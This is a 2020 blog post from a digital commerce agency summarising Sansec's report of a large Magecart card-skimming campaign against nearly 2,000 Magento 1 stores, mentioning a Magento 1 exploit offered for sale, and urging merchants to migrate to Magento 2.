Not to Say We Told You So… 2000 Magento Stores Hacked In The Largest-Ever Magecart Campaign

21 Sep 2020
Mike Patel
Mike Patel
Not to Say We Told You So… 2000 Magento Stores Hacked In The Largest-Ever Magecart Campaign

Sites still using the Magento 1 platform just got a serious wakeup call.

Sansec recently reported the news that hundreds of Magento Stores were hacked last weekend. The early breach detection system by Sansec that monitors the e-commerce spaces for security threats detected 1904 Magento stores having a keylogger (skimmer) on their checkout pages.

The attackers targeted the stores with Magecart skimmer to steal the card details of customers. It’s estimated that the private info of tens of thousands of customers was stolen via one of the compromised stores.

Cause of Attack?

This automated campaign is the largest ever Magecart attack since Sansec started monitoring in 2015. A typical Magecart attack where the injected malicious code would breach, intercept, and log the payment information of store customers. From 10 infected stores, the trouble spread faster than a California wildfire.

Sansec found the following data during its monitoring phase:

  • 10 stores got infected on Friday (11th September)
  • 1058 on Saturday (12th September)
  • 602 on Sunday ((13th September), and
  • 233 on Monday (14th September).

The massive scope of this hack shows the increased finesse and profitability of web skimming. More criminals are automating their operations for pushing web skimming schemes on as many stores as possible.

No History of Breaches

According to Sansec, many of the victimized stores didn’t have any history of security incidents, which suggests that a new method of attack was used to gain server (write) access to all these compromised stores.

The inspected stores were found running Magento version 1, which was reached its End-of-Life on June 30, 2020. It didn’t take long for the Black Hats to sneak into sites that left the doors unlocked.

Magento 1 Zero-day Vulnerability

While Sansec is still investigating the exact vector, the campaign may be related to the recent Magento 1 zero-day (exploit), which was put up for sale a few weeks ago on a hacking forum. A user, “z3r0day” (username) announced to sell Magento 1 “remote code execution” exploit method with an instruction video for $5,000.

To sweeten the deal, he pledged to sell only 10 copies of the exploit and also stated that no admin rights are required to inject this code in the JS file! Hey, he was only looking to make $50k to let hackers rob customers blind.

Nice guy, right?

What made Magento Stores Vulnerable?

The inspection by Sansec reveals that the hacked stores were still operating on Magento version 1. Magento ended support for the Magento 1.x platform, no bug fixes or updates on security patches after June 30, 2020.

Customers Had an Early Heads-Up…Really Early

After the release of Magento 2 in November 2015, Magento committed to a time of 36 months and then extended it 55 months to offer support to Magento 1.x store owners. Magento urged merchants to migrate to Magento 2 platform before the end of support.

Visa and PayPal also warned Magento 1 stores to migrate to Magento 2 or any other e-commerce platform before Magento cut off any security patches or bug fixes.

It’s high time for merchants running their e-commerce stores on the Magento 1.x platform to make the switch. Don’t join the list of stores that leave their customers open to fraud! Migrate your Magento store before it’s compromised.

Mike Patel
Mike Patel linkedin

Mike Patel is the Founder and CEO of ioVista, a leading digital commerce agency specializing in eCommerce solutions. With a strong background in business and technology, Mike Patel has been at the forefront of driving digital transformations for businesses. He has successfully navigated the ever-changing landscape of eCommerce, helping companies leverage the power of online platforms to grow their brand, increase revenues, and optimize their digital presence. Under his leadership, ioVista has become a trusted partner with major technology companies: Adobe/Magento, Google, BigCommerce, Shopify, and Yahoo. He is dedicated to staying ahead of industry trends, adopting cutting-edge technologies, and continuously improving strategies to provide clients with a competitive edge. Mike’s commitment to excellence and client satisfaction is evident in every project ioVista undertakes.

Get in Touch

    Start Your Free Website & Platform Assessment.

    Get in touch with us if you have a web development or digital marketing project that you would like to get underway!

    Platform Assessment